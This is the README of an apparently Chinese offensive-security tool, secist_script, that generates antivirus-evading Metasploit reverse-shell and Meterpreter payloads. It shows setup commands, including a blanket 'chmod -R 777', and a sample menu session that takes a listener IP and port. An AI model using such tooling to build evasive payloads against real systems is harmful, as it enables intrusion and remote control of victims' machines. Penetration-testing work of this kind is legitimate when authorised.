#secist_script
由于传播,利用此脚本所提供的工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,即刻安全以及工具作者不为此承担任何责任。
#说明
此款工具借鉴
https://github.com/govolution/avet => avet
https://github.com/CroweCybersecurity/ps1encode => ps1encode
https://github.com/M4sc3r4n0/avoidz =>avoidz
web_delivery => msf
Invoke => powershell
#用法(Usage):
git clone https://github.com/demonsec666/secist_script.git
sudo chmod -R 777 .
3 sudo ./setup.sh
- sudo ./secist_script.sh
#例子 secist> 7
< avoidz Payload >
--------------------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
+------------++-------------------------++-----------------------+ 即刻安全周年庆版v1.6 (secist----2017.7.14)
你的IP地址 :192.168.1.103
系统版本 :Kali GNU/Linux Rolling \n \l
+------------++-------------------------++-----------------------+
[1] Meterpreter_Reverse_tcp [5] Shell_reverse_tcp
[2] Meterpreter_Reverse_http [6] Powershell_reverse_tcp
[3] Meterpreter_Reverse_https [7] Multi encode payload
[4] Meterpreter_Reverse_tcp_dns [8] exit
[9] back meun
secist> 1
secist>请输入你的ip地址: 192.168.1.103
secist>请输入你的端口: 4444 请稍等几分钟,您的烤鱼即将出炉=====================================》 ##################################################################
Tool To bypass most A.V - dev-labs
#作者(About Me)
即刻安全 => demon
博客 => www.ggsec.cn
团队博客 =>www.secist.com
Metasploit 系列教程 => 链接:https://pan.baidu.com/s/1dFzPkJZ 密码:evwg
Metasploit 系列教程 第八课=> www.ggsec.cn/MSF8-0.html